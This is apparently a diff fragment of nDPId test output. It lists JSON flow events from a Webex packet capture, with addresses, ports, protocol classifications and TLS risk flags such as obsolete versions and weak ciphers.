+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636180,"flow_last_seen":1444570636961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":7084,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS 
Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636259,"flow_last_seen":1444570640345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1444570636270,"flow_last_seen":1444570640346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636151,"flow_last_seen":1444570638237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640284,"flow_last_seen":1444570645701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1444570718801,"flow_last_seen":1444570739041,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Webex","breed":"Acceptable","category":"VoIP"}} 
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1444570718801,"flow_last_seen":1444570739041,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636255,"flow_last_seen":1444570639258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":7052,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636248,"flow_last_seen":1444570639255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570632436,"flow_last_seen":1444570633205,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":4426,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS 
Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570638225,"flow_last_seen":1444570642072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":5437,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636359,"flow_last_seen":1444570639256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640330,"flow_last_seen":1444570670371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640338,"flow_last_seen":1444570670373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00925{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":105,"flow_first_seen":1444570669736,"flow_last_seen":1444570738301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":13596,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00927{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":513,"flow_first_seen":1444570669745,"flow_last_seen":1444570732084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29642,"flow_tot_l4_payload_len":316364,"flow_avg_l4_payload_len":616,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570674487,"flow_last_seen":1444570675890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1444570679512,"flow_last_seen":1444570680667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":5379,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570693238,"flow_last_seen":1444570694561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570732086,"flow_last_seen":1444570734115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570712008,"flow_last_seen":1444570716597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570640382,"flow_last_seen":1444570699865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00927{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1444570738415,"flow_last_seen":1444570742172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14319,"flow_tot_l4_payload_len":34572,"flow_avg_l4_payload_len":1440,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570640385,"flow_last_seen":1444570699915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570636364,"flow_last_seen":1444570640403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640310,"flow_last_seen":1444570645707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1444570699916,"flow_last_seen":1444570700460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1444570700561,"flow_last_seen":1444570713719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1375,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570700563,"flow_last_seen":1444570713710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1444570713719,"flow_last_seen":1444570715293,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1011,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 